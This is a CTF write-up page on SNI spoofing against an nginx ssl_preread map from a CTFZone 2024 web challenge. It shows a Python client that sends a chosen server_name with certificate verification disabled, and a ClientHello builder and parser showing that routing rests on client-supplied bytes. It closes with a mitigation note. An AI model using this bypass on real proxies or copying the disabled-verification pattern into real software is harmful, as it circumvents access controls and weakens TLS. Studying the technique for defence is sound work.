sni-spoof
Lessons learned from CTFZone CTF 2024: [WEB] youtube-unlock
Client-side TLS wrapper that sends the spoofed SNI (the original one-liner, split out and made runnable):

```python
import socket
import ssl

# Placeholder for the challenge host, which this page does not name.
TARGET_HOST = "challenge-host.example"

# Client context that skips certificate verification, so the handshake
# completes even though the SNI we send does not match the server's cert.
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE

conn = socket.create_connection((TARGET_HOST, 443))
# server_hostname is what goes into the ClientHello server_name extension.
# It is only accepted in client mode: the original server_side=True makes
# ssl raise ValueError("server_hostname can only be specified in client mode").
ssl_sock = context.wrap_socket(conn, server_hostname='www.spoofed-sni.com')
```
Relevant nginx.conf block:
```nginx
map $ssl_preread_server_name $proxy {
    youtube.com      backend;
    www.youtube.com  backend;
    default          backend_default;
}
```
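Why the map above is bypassable: $ssl_preread_server_name is read straight out of the unencrypted ClientHello, before any certificate or key is involved, so the routing key is whatever the client chose to write there. The added example below (not from the challenge or from nginx) builds a minimal ClientHello with a chosen server_name, parses it back the way ssl_preread does, and applies the page's map to the result; record layout fields other than the extension are constructed filler.

```python
import struct
from typing import Optional

def build_client_hello(sni: str) -> bytes:
    """Constructed minimal TLS ClientHello record carrying a server_name extension."""
    name = sni.encode()
    entry = b"\x00" + struct.pack("!H", len(name)) + name          # type host_name
    sni_list = struct.pack("!H", len(entry)) + entry
    ext = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list      # ext type 0 = SNI
    body = (b"\x03\x03" + b"\x00" * 32       # version, random (filler)
            + b"\x00"                         # empty session_id
            + b"\x00\x02\x13\x01"             # one cipher suite
            + b"\x01\x00"                     # null compression
            + struct.pack("!H", len(ext)) + ext)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body       # type ClientHello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake

def extract_sni(record: bytes) -> Optional[str]:
    """Pull server_name out of a ClientHello exactly as a preread proxy sees it: plaintext."""
    if not record or record[0] != 0x16:          # not a handshake record
        return None
    hs = record[5:]
    if hs[0] != 0x01:                            # not a ClientHello
        return None
    p = 4 + 2 + 32                               # handshake header, version, random
    p += 1 + hs[p]                               # session_id
    p += 2 + struct.unpack("!H", hs[p:p + 2])[0] # cipher_suites
    p += 1 + hs[p]                               # compression_methods
    end = p + 2 + struct.unpack("!H", hs[p:p + 2])[0]
    p += 2
    while p + 4 <= end:
        etype, elen = struct.unpack("!HH", hs[p:p + 4])
        p += 4
        if etype == 0 and hs[p + 2] == 0:        # skip list length, expect host_name
            nlen = struct.unpack("!H", hs[p + 3:p + 5])[0]
            return hs[p + 5:p + 5 + nlen].decode()
        p += elen
    return None

# The page's nginx map, as a dict: the backend is chosen from client-supplied bytes only.
ROUTES = {"youtube.com": "backend", "www.youtube.com": "backend"}

def route_for(record: bytes) -> str:
    return ROUTES.get(extract_sni(record), "backend_default")
```

The mitigation follows from the same observation: a preread map is a routing hint, not an authorization check, so the backend still has to verify what it receives after termination.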
Useful sources:
https://www.cloudflare.com/learning/ssl/what-is-sni/
https://medium.com/@hirushaadi/tcp-over-ssl-tunnel-with-sni-spoofing-analysis-da7f267bad56
sni-spoof.1724246392.txt.gz · Last modified: 2024/08/21 13:19 by osorin